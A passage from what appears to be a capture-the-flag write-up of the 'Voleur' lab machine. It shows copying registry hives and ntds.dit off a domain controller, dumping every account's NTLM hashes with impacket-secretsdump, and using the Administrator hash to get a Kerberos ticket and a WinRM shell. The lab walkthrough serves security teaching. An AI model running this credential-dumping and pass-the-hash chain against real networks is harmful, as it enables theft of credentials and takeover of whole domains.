-r-xr-xr-x 1 svc_backup svc_backup 2602 Jan 30 08:10 id_rsa

svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls -la
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11  .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11  ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49  registry

svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls -laR registry/
registry/:
total 17952
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup    32768 Jan 30 03:30 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 03:30 SYSTEM

Let’s start by getting this first.

  • SECURITY – Holds DPAPI system keys, LSA secrets
  • SYSTEM – Holds boot key and used to decrypt SAM & DPAPI secrets

This is a full registry backup, used for offline hash & secret extraction.

SCP

1
2
3
4
5
scp -P 2222 -i ../id_rsa svc_backup@voleur.htb:'/mnt/c/IT/Third-Line Support/Backups/Registry/SYSTEM' .
SYSTEM                                                                                         100%   18MB 186.4KB/s   01:36    
                                                                                                                                 
┌──(kali㉿vm-kali)-[~/htb/voleur/SSH_FILES]
└─$ scp -P 2222 -i ../id_rsa svc_backup@voleur.htb:'/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit' .

Getting hashes from SYSTEM Registry

1
impacket-secretsdump -system SYSTEM -ntds ntds.dit -outputfile hashes LOCAL

You should have the hashes file of every user.

1
2
3
4
5
6
7
8
9
10
11
12
13
cat hashes.ntds          
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::

Getting a kerberos ticket as admin

We could use Administrator hash to get a kerberos ticket.

1
2
3
4
5
6
7
8
9
impacket-getTGT 'voleur.htb/administrator' -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 -dc-ip 10.10.11.76         
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator.ccache

└─$ export KRB5CCNAME=administrator.ccache 
                                                                                                                                 
┌──(kali㉿vm-kali)-[~/htb/voleur/SSH_FILES]
└─$ evil-winrm -i dc.voleur.htb -r voleur.htb -u administrator
This post is licensed under CC BY 4.0 by the author.